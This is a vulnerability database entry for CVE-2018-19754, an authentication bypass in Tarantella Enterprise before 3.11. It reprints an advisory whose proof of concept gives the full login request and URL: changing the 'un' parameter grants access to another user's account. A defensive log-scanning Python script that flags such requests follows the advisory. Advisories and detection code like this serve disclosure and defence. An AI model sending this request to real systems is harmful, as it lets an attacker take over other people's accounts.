Tarantella Enterprise Security Vulnerability

Vulnerability ID 1417480 Vulnerability Type
Published 2018-12-03 Updated 2018-12-03
CVE ID CVE-2018-19754 CNNVD-ID CNNVD-201812-017
Platform N/A CVSS Score N/A
|Vulnerability Source
https://cxsecurity.com/issue/WLB-2018120013
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201812-017
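|Vulnerability Details
Tarantella Enterprise is a centralized data and application management tool that provides a web management interface and runs on most Unix and Linux platforms. A security vulnerability exists in Tarantella Enterprise versions before 3.11. An attacker can exploit it to gain access to user accounts by modifying a parameter value in the login request.
|Exploit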
Vulnerability found in 2009.

<!--
# Exploit Title: Security Bypass Access Control Vulnerability in Tarantella Enterprise before 3.11
# Date: 30-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.sun.com/ & http://www.oracle.com/
# Software Link: the product is discontinued (vulnerability found in 2009)
# Version: Tarantella Enterprise before 3.11
# Tested on: All
# CVE : CVE-2018-19754
# Category: webapps


1. Description

Tarantella Enterprise before 3.11 allows an access control bypass: the
application does not prevent one user from gaining access to another user's
account by modifying the parameter value in a login request.


2. Proof of Concept

Send a POST request like:

POST /tarantella/cgi-bin/post2get/tarantella/resources/login/sco/tta/boot/strap_XXXX.html HTTP/1.1
Accept: */*
Referer: https://XXXX.XXXX:444/html/form_ttaXXXX.html
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727)
Host: ttarima.cnso
Content-Length: 61
Connection: Keep-Alive
Cache-Control: no-cache

action=bootstrap&pg=index.html&px=DIRECT&un=<username>&ms=unique

Where the parameter un is the username you know. You receive the message:

"The content of this file must be language independent! This applet
immediately loads a new document in a named frame (here WebtopFrame), which
will be something like: ../logintheme/clientcap/index.html. The logintheme
is determinated from the appropiate attribute in the datastore. -->"

Now change the username to access the application:

https://XXX.XXX/tarantella/cgi-bin/post2get/tarantella/resources/login/sco/tta/boot/strap_XXXX.html?action=bootstrap&pg=index.html&px=DIRECT&un=<valid_username>&ms=unique


3. Solution:

The product is discontinued.
https://www.oracle.com/us/assets/lifetime-support-hardware-301321.pdf

-->
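
For defenders still running this discontinued product, an added example (not part of the original advisory or any vendor code): a log check that flags clients requesting the bootstrap URL above with more than one `un` value. The combined log format, the threshold, the function names and the sample log lines are assumptions made for this example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Combined-log-format request line (the log format is an assumption).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" \d{3}')
# Bootstrap login resource from the advisory; the strap_ suffix is elided there.
PATH_RE = re.compile(
    r"^/tarantella/cgi-bin/post2get/tarantella/resources/login/sco/tta/boot/strap_[^/]*\.html$")

def bootstrap_usernames_by_client(lines):
    """Map client IP -> sorted un= values seen on bootstrap URLs.

    Only query strings are visible in access logs; the POST form of the
    request needs body logging at a proxy or WAF to be inspected.
    """
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        query = parse_qs(url.query, keep_blank_values=True)
        if PATH_RE.match(url.path) and query.get("action") == ["bootstrap"]:
            seen[m.group("ip")].update(query.get("un", []))
    return {ip: sorted(users) for ip, users in seen.items() if users}

def suspicious_clients(lines, max_users=1):
    """Clients that named more than max_users accounts (threshold is an assumption)."""
    hits = bootstrap_usernames_by_client(lines)
    return {ip: users for ip, users in hits.items() if len(users) > max_users}

# Constructed sample log lines (documentation IPs, made-up usernames and suffix).
_URL = ("/tarantella/cgi-bin/post2get/tarantella/resources/login/sco/tta/boot/"
        "strap_0001.html?action=bootstrap&pg=index.html&px=DIRECT&un={}&ms=unique")
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Dec/2018:10:00:01 +0000] "GET %s HTTP/1.1" 200 512' % _URL.format("alice"),
    '192.0.2.10 - - [03/Dec/2018:10:00:09 +0000] "GET %s HTTP/1.1" 200 512' % _URL.format("bob"),
    '192.0.2.20 - - [03/Dec/2018:10:02:00 +0000] "GET %s HTTP/1.1" 200 512' % _URL.format("carol"),
    '192.0.2.30 - - [03/Dec/2018:10:03:00 +0000] "GET /index.html?un=dave HTTP/1.1" 200 99',
]

if __name__ == "__main__":
    for ip, users in suspicious_clients(SAMPLE_LOG).items():
        print(f"{ip} requested bootstrap for multiple accounts: {', '.join(users)}")
```

Since the product is discontinued and has no fix, a hit here is a reason to review the named accounts and to restrict network access to the web interface.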


|References

Source: packetstormsecurity.com

Link: https://packetstormsecurity.com/files/150542/Tarantella-Enterprise-Security-Bypass.html